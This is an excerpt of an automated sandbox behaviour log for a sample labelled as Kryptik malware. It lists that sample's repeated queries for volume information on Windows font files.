Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation	Jump to behavior
